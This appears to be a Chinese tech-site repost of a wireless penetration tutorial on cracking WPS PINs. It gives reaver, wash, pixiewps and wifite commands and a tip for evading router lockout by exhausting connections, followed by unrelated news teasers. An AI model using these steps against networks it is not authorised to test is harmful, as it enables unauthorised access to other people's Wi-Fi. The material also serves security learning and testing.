无线渗透_WPS攻击

2022年07月07日18:00:14 科技 1519

WPS(WIRELESS PROTECTED SETUP)

  • WPS是WIFI联盟2006年开发的一项技术
    • 通过PIN码来简化无线接入的操作,无需记住PSK
    • 路由器和网卡各按一个按钮就能接入无线
    • PIN码是分为前后各4位的2段共8位数字
  • 安全漏洞
    • PSK:218,340,105,854,896
    • 2011年被发现安全涉及漏洞
    • 接入发起方可以根据路由器的返回信息判断前4位是否正确
    • 而PIN码的后4位只有1000种定义的组合(最后一位是checksum
    • 所以全部穷举破解只需要11000次尝试
    • 标准本身没有设计锁定机制,目前多个厂商已实现锁定机制



  • 包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
  • 即使在WEB界面中有关闭WPS,配置也不会生效
  • 攻击难度相对较低,防御却十分困难
  • 一般可在4-10小时内爆破密码
    • PSK
  • 用计算机直接算出PIN
    • C83A35
    • 00B00C


实际流程

  • 启动侦听模式后,发现支持WPS的AP
  • wash -i wlan0mon
    #或者
    airodump-ng wlan0mon
    --wps

无线渗透_WPS攻击 - 天天要闻


  • 爆破PIN码
reaver -i wlan0mon -b <AP mac> -vv


无线渗透_WPS攻击 - 天天要闻



  • 秒破PIN码
reaver -i wlan0mon -b <AP mac> -vv -K 1

pixiewps

  • 只是使用固定厂商的芯片,成功率很低


  • 得到PIN码之后就可以继续破解
reaver -i wlan0mon -b <AP mac> -vv -p  [PIN码]


问题:

  • 很多厂家实现了锁定机制,所以爆破时应注意限速
  • 一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定


  • 综合自动化无线密码破解工具 wifite

无线渗透_WPS攻击 - 天天要闻


  • 按住CRTL+C输入编号即可进行攻击


无线渗透_WPS攻击 - 天天要闻



  • 等待之后就可以破解出来


无线渗透_WPS攻击 - 天天要闻

科技分类资讯推荐

ISO 9001认证有效期到期后如何续证?详细步骤分享 - 天天要闻

ISO 9001认证有效期到期后如何续证?详细步骤分享

在全球化竞争日益激烈的今天,企业对于提升自身的管理水平和产品质量的需求越来越迫切。ISO 9001认证作为国际公认的质量管理标准,不仅能够帮助企业实现这一目标,更是企业参与市场竞争的重要凭证。
中国化学东华科技总承包的山西亚鑫项目DMC装置塔起灯亮 - 天天要闻

中国化学东华科技总承包的山西亚鑫项目DMC装置塔起灯亮

6月23日,由中国化学东华科技总承包的山西亚鑫融科新材料有限公司高端电子新材料项目第一批“穿衣戴帽”设备甲醇脱水塔和DMC分离塔吊装完成,实现“塔起灯亮”,标志着项目又一重要安装作业节点顺利完成。塔起灯亮。沈方辰摄项目甲醇脱水塔高约53米,“穿衣戴帽”后重达71吨,是全厂最高塔器,DMC分离塔高约41米,“穿衣戴...
X3D强到无语!AMD锐龙7 9700X考虑开放功耗:65W变120W - 天天要闻

X3D强到无语!AMD锐龙7 9700X考虑开放功耗:65W变120W

快科技6月27日消息,AMD Zen5架构的锐龙9000系列首发四款型号,16核心旗舰热设计功耗170W,12核心只需120W,8核心竟然从105W压到了与6核显相同的65W(牺牲基准频率),不过AMD又有了新的想法。原因主要是AMD X3D系列太成功了,游戏性能遥遥领先,新锐龙9000系列也不是对手,而新的锐龙9000 X3D还不一定得等什么时候。AMD正
一季度国内云服务商排名出炉:阿里云领先 华为云第二 - 天天要闻

一季度国内云服务商排名出炉:阿里云领先 华为云第二

【CNMO科技消息】据Canalys最新数据,2024年第一季度,中国大陆的云基础服务支出同比增长20%,达92亿美元。中国云服务市场的三巨头——阿里云,华为云和腾讯云,继续保持主导地位,共同增长22%,占据整个市场72%的份额,但相比上个